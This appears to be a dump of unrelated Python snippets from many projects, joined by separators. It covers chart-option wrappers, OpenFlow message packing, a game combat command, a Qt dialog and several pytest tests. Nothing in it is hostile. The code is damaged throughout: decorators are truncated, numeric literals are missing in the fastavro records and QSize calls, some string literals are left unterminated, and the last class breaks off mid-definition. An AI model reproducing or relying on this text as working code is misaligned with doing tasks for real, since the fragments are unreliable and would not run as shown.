return self.group.remove_members(self)
def name(self):
for attr in ('display_name', 'nick_name', 'wxid'):
_name = getattr(self, attr, None)
if _name:
return _name |
class _BaseTwitchCombatCommand(Command):
def at_pre_command(self):
if ((not self.caller.location) or (not self.caller.location.allow_combat)):
self.msg("Can't fight here!")
raise InterruptCommand()
def parse(self):
self.args = args = self.args.strip()
(self.lhs, self.rhs) = ('', '')
if (not args):
return
if (' on ' in args):
(lhs, rhs) = args.split(' on ', 1)
else:
(lhs, *rhs) = args.split(None, 1)
rhs = ' '.join(rhs)
(self.lhs, self.rhs) = (lhs.strip(), rhs.strip())
def get_or_create_combathandler(self, target=None, combathandler_key='combathandler'):
if target:
if (target.hp_max is None):
self.msg("You can't attack that!")
raise InterruptCommand()
EvAdventureCombatTwitchHandler.get_or_create_combathandler(target, key=combathandler_key)
return EvAdventureCombatTwitchHandler.get_or_create_combathandler(self.caller) |
def _freeze_matched_bn(module, name, reg_exps, matched_names, unmatched_names):
res = module
if (len(list(module.children())) == 0):
if isinstance(module, nn.modules.batchnorm._BatchNorm):
matched = False
for frozen_layers_regex in reg_exps:
if re.match(frozen_layers_regex, name):
matched = True
matched_names.append(name)
res = FrozenBatchNorm2d.convert_frozen_batchnorm(module)
if (not matched):
unmatched_names.append(name)
return res
for (child_name, child) in module.named_children():
_name = (((name + '.') + child_name) if (name != '') else child_name)
new_child = _freeze_matched_bn(child, _name, reg_exps, matched_names, unmatched_names)
if (new_child is not child):
res.add_module(child_name, new_child)
return res |
class OptionSeriesTreemapStatesInactive(Options):
def animation(self) -> 'OptionSeriesTreemapStatesInactiveAnimation':
return self._config_sub_data('animation', OptionSeriesTreemapStatesInactiveAnimation)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def opacity(self):
return self._config_get(0.2)
def opacity(self, num: float):
self._config(num, js_type=False) |
def test_get_ipv4_os():
endpoint = endpoint_factory('foo')
endpoint.endpoint_data = {'tenant': 'foo', 'mac': '00:00:00:00:00:00', 'segment': 'foo', 'port': '1', 'ipv4': '0.0.0.0'}
endpoint.metadata = {'ipv4_addresses': {}}
ipv4_os = GetData._get_ipv4_os(endpoint)
assert (ipv4_os == NO_DATA)
endpoint.metadata = {'ipv4_addresses': {'0.0.0.0': {'short_os': 'foo'}}}
ipv4_os = GetData._get_ipv4_os(endpoint)
assert (ipv4_os == 'foo') |
class GS(JsPackage):
lib_alias = {'js': 'gridstack', 'css': 'gridstack'}
def added(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('added', function(event, items){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def change(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('change', function(event, items){let data = items; %s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def disable(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('disable', function(event){let grid = event.target.gridstack; %s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def dragstart(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('dragstart', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def drag(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('drag', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def dragstop(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('dragstop', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def dropped(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('dropped', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def enable(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('enable', function(event){let grid = event.target.gridstack; %s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def removed(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('removed', function(event, items){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def resizestart(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('resizestart', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def resize(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('resize', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def resizestop(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=False):
return JsObjects.JsVoid(("%s.on('resizestop', function(event, el){%s})" % (self.varName, JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile))))
def init_(self, attrs: dict=None, html_code: str=None):
return JsObjects.JsVoid(("var %s = GridStack.init(%s, '%s')" % ((html_code or self.component.html_code), self.component.options.config_js(attrs), (html_code or self.component.html_code))))
def initAll(self, attrs: dict=None, selectpr: str='.grid-stack'):
return JsObjects.JsVoid(("GridStack.init(%s, '%s')" % (self.component.options.config_js(attrs), selectpr)))
def addComponent(self, component):
component.options.managed = False
return JsObjects.JsVoid(("%s.addWidget('%s')" % (self.varName, component.html()))) |
class OptionPlotoptionsArcdiagramStatesSelect(Options):
def animation(self) -> 'OptionPlotoptionsArcdiagramStatesSelectAnimation':
return self._config_sub_data('animation', OptionPlotoptionsArcdiagramStatesSelectAnimation)
def borderColor(self):
return self._config_get('#000000')
def borderColor(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get('#cccccc')
def color(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False) |
def test_override():
class _Container(containers.DeclarativeContainer):
p11 = providers.Provider()
class _OverridingContainer1(containers.DeclarativeContainer):
p11 = providers.Provider()
class _OverridingContainer2(containers.DeclarativeContainer):
p11 = providers.Provider()
p12 = providers.Provider()
container = _Container()
overriding_container1 = _OverridingContainer1()
overriding_container2 = _OverridingContainer2()
container.override(overriding_container1)
container.override(overriding_container2)
assert (container.overridden == (overriding_container1, overriding_container2))
assert (container.p11.overridden == (overriding_container1.p11, overriding_container2.p11))
assert (_Container.overridden == tuple())
assert (_Container.p11.overridden == tuple()) |
def test_nan_behaviour_error_fit(df_enc_big_na):
encoder = StringSimilarityEncoder(missing_values='raise')
with pytest.raises(ValueError) as record:
encoder.fit(df_enc_big_na)
msg = "Some of the variables in the dataset contain NaN. Check and remove those before using this transformer or set the parameter `missing_values='ignore'` when initialising this transformer."
assert (str(record.value) == msg) |
class RawLinesEditReplaceCommand(sublime_plugin.TextCommand):
text = None
region = None
def run(self, edit):
cls = RawLinesEditReplaceCommand
if ((cls.text is not None) and (cls.region is not None)):
self.view.replace(edit, cls.region, cls.text)
cls.text = None
cls.region = None |
class TestCAM16CAM16LCD(util.ColorAssertsPyTest):
COLORS = [('red', 'color(--cam16-lcd 59.178 59.994 31.089)'), ('orange', 'color(--cam16-lcd 78.364 12.557 37.084)'), ('yellow', 'color(--cam16-lcd 96.802 -17.273 44.653)'), ('green', 'color(--cam16-lcd 46.661 -35.677 27.573)'), ('blue', 'color(--cam16-lcd 36.252 11.909 -52.61)'), ('indigo', 'color(--cam16-lcd 24.524 25.511 -29.451)'), ('violet', 'color(--cam16-lcd 74.738 36.686 -20.013)'), ('white', 'color(--cam16-lcd 100 -1.9348 -1.0961)'), ('gray', 'color(--cam16-lcd 56.23 -1.2714 -0.72038)'), ('black', 'color(--cam16-lcd 0 0 0)'), ('color(--cam16-lcd 50 10 -10)', 'color(--cam16-lcd 50 10 -10)'), ('color(--cam16-lcd 50 10 -10 / 0.5)', 'color(--cam16-lcd 50 10 -10 / 0.5)'), ('color(--cam16-lcd 50% 50% -50% / 50%)', 'color(--cam16-lcd 50 35 -35 / 0.5)'), ('color(--cam16-lcd none none none / none)', 'color(--cam16-lcd none none none / none)'), ('color(--cam16-lcd 0% 0% 0%)', 'color(--cam16-lcd 0 0 0)'), ('color(--cam16-lcd 100% 100% 100%)', 'color(--cam16-lcd 100 70 70)'), ('color(--cam16-lcd -100% -100% -100%)', 'color(--cam16-lcd -100 -70 -70)')]
.parametrize('color1,color2', COLORS)
def test_colors(self, color1, color2):
self.assertColorEqual(Color(color1).convert('cam16-lcd'), Color(color2)) |
def test_asset_store_collect2():
try:
from flexx import ui
except ImportError:
skip('no flexx.ui')
s = AssetStore()
s.update_modules()
assert (len(s.modules) > 10)
assert ('flexx.ui._widget' in s.modules)
assert ('$Widget =' in s.get_asset('flexx.ui._widget.js').to_string())
assert ('$Widget =' in s.get_asset('flexx.ui.js').to_string())
assert ('$Widget =' in s.get_asset('flexx.js').to_string())
assert ('$Widget =' not in s.get_asset('flexx.app.js').to_string()) |
def test_interpolate_vs_project(V):
mesh = V.mesh()
dim = mesh.geometric_dimension()
if (dim == 2):
(x, y) = SpatialCoordinate(mesh)
elif (dim == 3):
(x, y, z) = SpatialCoordinate(mesh)
shape = V.ufl_element().value_shape
if (dim == 2):
if (len(shape) == 0):
expression = (x + y)
elif (len(shape) == 1):
expression = as_vector([x, y])
elif (len(shape) == 2):
expression = as_tensor(([x, y], [x, y]))
elif (dim == 3):
if (len(shape) == 0):
expression = ((x + y) + z)
elif (len(shape) == 1):
expression = as_vector([x, y, z])
elif (len(shape) == 2):
expression = as_tensor(([x, y, z], [x, y, z], [x, y, z]))
f = interpolate(expression, V)
expect = project(expression, V)
assert np.allclose(f.dat.data, expect.dat.data, atol=1e-06) |
class JsHtmlLi(JsHtmlRich):
def has_state(self, state: str, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=None):
return self.component.js.if_(('%s.classList.contains(%s)' % (self.varName, JsUtils.jsConvertData(state, None))), js_funcs, profile=profile)
def is_active(self, js_funcs: types.JS_FUNCS_TYPES, profile: types.PROFILE_TYPE=None):
return self.has_state('active', js_funcs, profile=profile) |
.parametrize('compiled', [True, False])
def test_bytes_integer_struct_signed(compiled):
d = '\n struct test {\n int24 a;\n int24 b[2];\n int24 len;\n int24 dync[len];\n int24 c;\n int24 d[3];\n };\n '
c = cstruct.cstruct()
c.load(d, compiled=compiled)
a = c.test(b'AAABBBCCC\x02\x00\x00DDDEEE\xff\xff\xff\x01\xff\xff\x02\xff\xff\x03\xff\xff')
assert (a.a == 4276545)
assert (a.b == [4342338, 4408131])
assert (a.len == 2)
assert (a.dync == [4473924, 4539717])
assert (a.c == (- 1))
assert (a.d == [(- 255), (- 254), (- 253)]) |
def extractWwwBlackboxTlCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class LiveDetails():
def __init__(self):
self.spike_helper = GetSpike()
self.shield_helper = GetShields()
self.loadout_helper = GetLoadouts()
self.header_agent_helper = GetLiveAgents()
self.scoreboard_agents_helper = GetScoreBoardAgents()
self.scoreboard_detector_helper = ScoreBoardDetector()
self.health_helper = GetHealth()
self.ultimate_helper = GetUltimates()
self.old_score = [0, 0]
self.match_details = {}
def get_live_details(self, frame):
agents_health = self.health_helper.get_health(frame)
agents_health['blue'] = agents_health['left']
agents_health['red'] = agents_health['right']
spike_status = self.spike_helper.get_spike_status(frame)
header_agents = self.header_agent_helper.get_agents(frame)
header_agents['blue'] = header_agents['left']
header_agents['red'] = header_agents['right']
scoreboard_present = self.scoreboard_detector_helper.detect_scoreboard(frame)
print('ScoreBoardDetector', scoreboard_present)
if scoreboard_present:
agents_ultimate_points = self.ultimate_helper.get_ultimate_points(frame)
shields = self.shield_helper.get_shields(frame)
loadouts = self.loadout_helper.get_loadouts(frame)
scoreboard_agents = self.scoreboard_agents_helper.get_agents(frame)
agents_with_loadouts_shields = list(zip(scoreboard_agents['top'], loadouts['top'], shields['top'], agents_ultimate_points['top']))
return {'score': 'score', 'spike_status': spike_status, 'agents_with_loadouts_shields': agents_with_loadouts_shields, 'alive_agents': header_agents, 'health_values': agents_health}
return {'score': 'score', 'spike_status': spike_status, 'alive_agents': header_agents, 'health_values': agents_health} |
.parametrize('codec', ['snappy', 'zstandard', 'lz4'])
.skipif(is_testing_cython_modules(), reason='difficult to monkeypatch builtins on cython compiled code')
.skipif((os.name == 'nt'), reason='A pain to install codecs on windows')
def test_optional_codecs_not_installed_reading(monkeypatch, codec):
schema = {'doc': 'A weather reading.', 'name': 'Weather', 'namespace': 'test', 'type': 'record', 'fields': [{'name': 'station', 'type': 'string'}, {'name': 'time', 'type': 'long'}, {'name': 'temp', 'type': 'int'}]}
records = [{'station': '011990-99999', 'temp': 0, 'time': }, {'station': '011990-99999', 'temp': 22, 'time': }, {'station': '011990-99999', 'temp': (- 11), 'time': }, {'station': '012650-99999', 'temp': 111, 'time': }]
file = BytesIO()
fastavro.writer(file, schema, records, codec=codec)
file.seek(0)
orig_import = __import__
imports = {'snappy', 'zstandard', 'lz4.block', 'cramjam'}
def import_blocker(name, *args, **kwargs):
if (name in imports):
raise ImportError()
else:
return orig_import(name, *args, **kwargs)
with monkeypatch.context() as ctx:
ctx.setattr(builtins, '__import__', import_blocker)
for name in imports:
ctx.delitem(sys.modules, name, raising=False)
reload(fastavro._read_py)
with pytest.raises(ValueError, match=f'{codec} codec is supported but you need to install'):
list(fastavro.reader(file))
reload(fastavro._read_py) |
class Ui_WifiDialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName('Dialog')
Dialog.resize(372, 212)
self.gridLayout_2 = QtWidgets.QGridLayout(Dialog)
self.gridLayout_2.setObjectName('gridLayout_2')
self.groupBox = QtWidgets.QGroupBox(Dialog)
self.groupBox.setObjectName('groupBox')
self.gridLayout = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout.setObjectName('gridLayout')
self.label_3 = QtWidgets.QLabel(self.groupBox)
self.label_3.setObjectName('label_3')
self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
self.txtAddress = QtWidgets.QLineEdit(self.groupBox)
self.txtAddress.setObjectName('txtAddress')
self.gridLayout.addWidget(self.txtAddress, 0, 1, 1, 2)
self.label_4 = QtWidgets.QLabel(self.groupBox)
self.label_4.setObjectName('label_4')
self.gridLayout.addWidget(self.label_4, 1, 0, 1, 1)
self.txtPort = QtWidgets.QLineEdit(self.groupBox)
self.txtPort.setObjectName('txtPort')
self.gridLayout.addWidget(self.txtPort, 1, 1, 1, 2)
self.btnClear = QtWidgets.QPushButton(self.groupBox)
self.btnClear.setMaximumSize(QtCore.QSize(120, ))
self.btnClear.setObjectName('btnClear')
self.gridLayout.addWidget(self.btnClear, 2, 1, 1, 1)
self.btnSubmit = QtWidgets.QPushButton(self.groupBox)
self.btnSubmit.setMaximumSize(QtCore.QSize(120, ))
self.btnSubmit.setObjectName('btnSubmit')
self.gridLayout.addWidget(self.btnSubmit, 2, 2, 1, 1)
self.gridLayout_2.addWidget(self.groupBox, 0, 0, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate('Dialog', ''))
self.groupBox.setTitle(_translate('Dialog', ''))
self.label_3.setText(_translate('Dialog', ':'))
self.label_4.setText(_translate('Dialog', ':'))
self.txtPort.setText(_translate('Dialog', '6666'))
self.btnClear.setText(_translate('Dialog', ''))
self.btnSubmit.setText(_translate('Dialog', '')) |
.parametrize('test_input,expected', [('2', (2, 0, 0)), ('2+', (3, 0, 0)), ('3', (3, 0, 0)), ('1.2.3', (1, 2, 3)), ('1.2.3-beta', (1, 2, 3))])
def test_python_version_parse(test_input, expected):
f = StringIO(('\n [Core]\n Name = Config\n Module = config\n\n [Python]\n Version = %s\n ' % test_input))
assert (PluginInfo.load_file(f, None).python_version == expected) |
class InformationDisplayer(ErsiliaBase):
def __init__(self, info_data, config_json=None):
ErsiliaBase.__init__(self, config_json=config_json, credentials_json=None)
self.info_data = info_data
self.logger.debug(self.info_data)
def _echo(text, **styles):
if (emoji is not None):
text = emoji.emojize(text)
return click.echo(click.style(text, **styles))
def _description_info(self):
color = 'blue'
card = self.info_data['card']
text = ':rocket: {0}'.format(card['Title']).rstrip(os.linesep)
self._echo(text, fg=color, bold=True)
text = '{0}'.format(card['Description']).rstrip(os.linesep)
self._echo(text, fg=color)
text = ''
self._echo(text)
def _identifiers_info(self):
color = 'green'
card = self.info_data['card']
text = ':person_tipping_hand: Identifiers'
self._echo(text, fg=color, bold=True)
text = 'Model identifiers: {0}'.format(card['Identifier']).rstrip(os.linesep)
self._echo(text, fg=color)
text = 'Slug: {0}'.format(card['Slug']).rstrip(os.linesep)
self._echo(text, fg=color)
text = ''
self._echo(text)
def _code_info(self):
color = 'red'
card = self.info_data['card']
text = ':nerd_face: Code and parameters'
self._echo(text, fg=color, bold=True)
text = 'GitHub:
self._echo(text, fg=color)
if ('S3' in card):
s = card['S3']
else:
s = '-'
text = 'AWS S3: {0}'.format(s)
self._echo(text, fg=color)
text = ''
self._echo(text)
def _docker_info(self):
try:
color = 'blue'
card = self.info_data['card']
dockerhub_field = card['DockerHub']
docker_architecture = card['Docker Architecture']
text = ':whale: Docker'
self._echo(text, fg=color, bold=True)
text = 'Docker Hub: {0}'.format(dockerhub_field)
self._echo(text, fg=color)
text = 'Architectures: {0}'.format(','.join(docker_architecture))
self._echo(text, fg=color)
text = ''
self._echo(text)
except:
self.logger.warning('No metadata for Docker slots')
def echo(self):
self._description_info()
self._identifiers_info()
self._code_info()
self._docker_info()
text = 'For more information, please visit
self._echo(text, fg='black') |
def make_st_acc_i8_s2_v2(p=st_acc_i8):
p = rename(p, 'st_acc_i8_s2_v2')
p = bind_config(p, 'scale', ConfigStore, 'scale')
p = reorder_stmts(p, 'tmp : _ ; ConfigStore.scale = _')
p = reorder_stmts(p, 'src_tmp = _ ; ConfigStore.scale = _')
p = reorder_stmts(p, 'src_tmp : _ ; ConfigStore.scale = _')
p = old_fission_after(p, 'ConfigStore.scale = _', n_lifts=2)
p = write_config(p, p.find('ConfigStore.scale = _').after(), ConfigStore, 'dst_stride', 'stride(dst, 0)')
p = bind_config(p, 'act', ConfigStore, 'act')
p = reorder_stmts(p, 'clamp(_) ; ConfigStore.act = _')
p = reorder_stmts(p, 'tmp2 : _ ; ConfigStore.act = _')
p = reorder_stmts(p, 'acc_scale(_) ; ConfigStore.act = _')
p = reorder_stmts(p, 'tmp : _ ; ConfigStore.act = _')
p = reorder_stmts(p, 'src_tmp = _ ; ConfigStore.act = _')
p = reorder_stmts(p, 'src_tmp : _ ; ConfigStore.act = _')
p = old_fission_after(p, 'ConfigStore.act = _', n_lifts=2)
p = replace(p, 'for i in _:_', do_st_acc_i8)
p = replace(p, 'ConfigStore.scale = _ ;ConfigStore.dst_stride = _ ;ConfigStore.act = _', config_st_acc_i8)
return p |
class OptionSeriesPieStatesSelect(Options):
def animation(self) -> 'OptionSeriesPieStatesSelectAnimation':
return self._config_sub_data('animation', OptionSeriesPieStatesSelectAnimation)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def halo(self) -> 'OptionSeriesPieStatesSelectHalo':
return self._config_sub_data('halo', OptionSeriesPieStatesSelectHalo)
def lineWidth(self):
return self._config_get(None)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def lineWidthPlus(self):
return self._config_get(1)
def lineWidthPlus(self, num: float):
self._config(num, js_type=False)
def marker(self) -> 'OptionSeriesPieStatesSelectMarker':
return self._config_sub_data('marker', OptionSeriesPieStatesSelectMarker) |
class OptionSeriesColumnrangeSonificationContexttracksMappingVolume(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def database_docs(request):
(exports, extended_exports) = sql_statements.get_exports()
toc = []
d = {'CORE_SCHEMA': {'title': 'The core bibliothecula schema.', 'caption': '', 'statements': exports}, 'EXTENDED_SCHEMA': {'title': 'Extra useful flair.', 'caption': 'A list of utility SQL statements for use with the bibliothecula schema.', 'statements': extended_exports}}
for k in d:
toc.append((1, k, d[k]['title']))
if (len(d[k]['statements']['appendix']) > 0):
toc.append((2, f'{k}-APPENDIX', f"Appendix {d[k]['title']}"))
context = {'statements': [(k, d[k]) for k in d], 'toc': toc}
template = loader.get_template('database_doc.html')
return HttpResponse(template.render(context, request)) |
('ecs_deploy.cli.get_client')
def test_deploy_s3_env_file_with_previous_value(get_client, runner):
get_client.return_value = EcsTestClient('acces_key', 'secret_key')
result = runner.invoke(cli.deploy, (CLUSTER_NAME, SERVICE_NAME, '--s3-env-file', 'webserver', 'arn:aws:s3:::centerfun/.env', '--s3-env-file', 'webserver', 'arn:aws:s3:::stormzone/.env'))
assert (result.exit_code == 0)
assert (not result.exception)
assert (u'Deploying based on task definition: test-task:1' in result.output)
assert (u'Updating task definition' in result.output)
assert u'Changed environmentFiles of container "webserver" to: "{\'arn:aws:s3:::stormzone/.env\', \'arn:aws:s3:::coolBuckets/dev/.env\', \'arn:aws:s3:::myS3bucket/myApp/.env\', \'arn:aws:s3:::centerfun/.env\'}" (was: "{\'arn:aws:s3:::coolBuckets/dev/.env\', \'arn:aws:s3:::myS3bucket/myApp/.env\'}")'
assert (u'Successfully created revision: 2' in result.output)
assert (u'Successfully deregistered revision: 1' in result.output)
assert (u'Successfully changed task definition to: test-task:2' in result.output)
assert (u'Deployment successful' in result.output) |
class aggregate_stats_reply(stats_reply):
version = 6
type = 19
stats_type = 2
def __init__(self, xid=None, flags=None, stats=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (flags != None):
self.flags = flags
else:
self.flags = 0
if (stats != None):
self.stats = stats
else:
self.stats = ofp.stat()
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.stats_type))
packed.append(struct.pack('!H', self.flags))
packed.append(('\x00' * 4))
packed.append(self.stats.pack())
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = aggregate_stats_reply()
_version = reader.read('!B')[0]
assert (_version == 6)
_type = reader.read('!B')[0]
assert (_type == 19)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_stats_type = reader.read('!H')[0]
assert (_stats_type == 2)
obj.flags = reader.read('!H')[0]
reader.skip(4)
obj.stats = ofp.stat.unpack(reader)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.flags != other.flags):
return False
if (self.stats != other.stats):
return False
return True
def pretty_print(self, q):
q.text('aggregate_stats_reply {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('flags = ')
value_name_map = {1: 'OFPSF_REPLY_MORE'}
q.text(util.pretty_flags(self.flags, value_name_map.values()))
q.text(',')
q.breakable()
q.text('stats = ')
q.pp(self.stats)
q.breakable()
q.text('}') |
class socket(bsn_tlv):
type = 212
def __init__(self, value=None):
if (value != None):
self.value = value
else:
self.value = 0
return
def pack(self):
packed = []
packed.append(struct.pack('!H', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.value))
length = sum([len(x) for x in packed])
packed[1] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = socket()
_type = reader.read('!H')[0]
assert (_type == 212)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.value = reader.read('!L')[0]
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.value != other.value):
return False
return True
def pretty_print(self, q):
q.text('socket {')
with q.group():
with q.indent(2):
q.breakable()
q.text('value = ')
q.text(('%#x' % self.value))
q.breakable()
q.text('}') |
class TestMarkForumsReadView(BaseClientTestCase):
(autouse=True)
def setup(self):
self.u1 = UserFactory.create()
self.u2 = UserFactory.create()
self.g1 = GroupFactory.create()
self.u1.groups.add(self.g1)
self.u2.groups.add(self.g1)
self.user.groups.add(self.g1)
self.perm_handler = PermissionHandler()
self.tracks_handler = TrackingHandler()
self.top_level_cat_1 = create_category_forum()
self.top_level_cat_2 = create_category_forum()
self.forum_1 = create_forum(parent=self.top_level_cat_1)
self.forum_2 = create_forum(parent=self.top_level_cat_1)
self.forum_2_child_1 = create_forum(parent=self.forum_2)
self.forum_3 = create_forum(parent=self.top_level_cat_1)
self.forum_4 = create_forum(parent=self.top_level_cat_2)
self.topic = create_topic(forum=self.forum_2, poster=self.u1)
PostFactory.create(topic=self.topic, poster=self.u1)
ForumReadTrackFactory.create(forum=self.forum_2, user=self.u2)
ForumReadTrackFactory.create(forum=self.forum_2, user=self.user)
assign_perm('can_read_forum', self.g1, self.top_level_cat_1)
assign_perm('can_read_forum', self.g1, self.top_level_cat_2)
assign_perm('can_read_forum', self.g1, self.forum_1)
assign_perm('can_read_forum', self.g1, self.forum_2)
assign_perm('can_read_forum', self.g1, self.forum_2_child_1)
assign_perm('can_read_forum', self.g1, self.forum_4)
def test_browsing_works(self):
correct_url_1 = reverse('forum_tracking:mark_all_forums_read')
correct_url_2 = reverse('forum_tracking:mark_subforums_read', kwargs={'pk': self.top_level_cat_1.pk})
response_1 = self.client.get(correct_url_1, follow=True)
response_2 = self.client.get(correct_url_2, follow=True)
assert (response_1.status_code == 200)
assert (response_2.status_code == 200)
def test_can_mark_all_readable_forums_read(self):
new_topic = create_topic(forum=self.forum_2, poster=self.u1)
PostFactory.create(topic=new_topic, poster=self.u1)
correct_url = reverse('forum_tracking:mark_all_forums_read')
response = self.client.post(correct_url, follow=True)
assert (response.status_code == 200)
assert (list(self.tracks_handler.get_unread_forums(self.user)) == [])
def test_can_mark_subforums_read(self):
new_topic = create_topic(forum=self.forum_2, poster=self.u1)
PostFactory.create(topic=new_topic, poster=self.u1)
new_topic = create_topic(forum=self.forum_4, poster=self.u1)
PostFactory.create(topic=new_topic, poster=self.u1)
correct_url = reverse('forum_tracking:mark_subforums_read', kwargs={'pk': self.top_level_cat_1.pk})
response = self.client.post(correct_url, follow=True)
assert (response.status_code == 200)
assert (set(self.tracks_handler.get_unread_forums(self.user)) == set([self.top_level_cat_2, self.forum_4])) |
class Integer(Integer32):
def withNamedValues(cls, **values):
enums = set(cls.namedValues.items())
enums.update(values.items())
class X(cls):
namedValues = namedval.NamedValues(*enums)
subtypeSpec = (cls.subtypeSpec + constraint.SingleValueConstraint(*values.values()))
X.__name__ = cls.__name__
return X |
class OptionSeriesPyramidSonificationDefaultinstrumentoptionsMapping(Options):
def frequency(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingFrequency':
return self._config_sub_data('frequency', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingFrequency)
def gapBetweenNotes(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingGapbetweennotes':
return self._config_sub_data('gapBetweenNotes', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingGapbetweennotes)
def highpass(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingHighpass':
return self._config_sub_data('highpass', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingHighpass)
def lowpass(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingLowpass':
return self._config_sub_data('lowpass', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingLowpass)
def noteDuration(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingNoteduration':
return self._config_sub_data('noteDuration', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingNoteduration)
def pan(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPan':
return self._config_sub_data('pan', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPan)
def pitch(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPitch':
return self._config_sub_data('pitch', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPitch)
def playDelay(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPlaydelay':
return self._config_sub_data('playDelay', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPlaydelay)
def time(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTime':
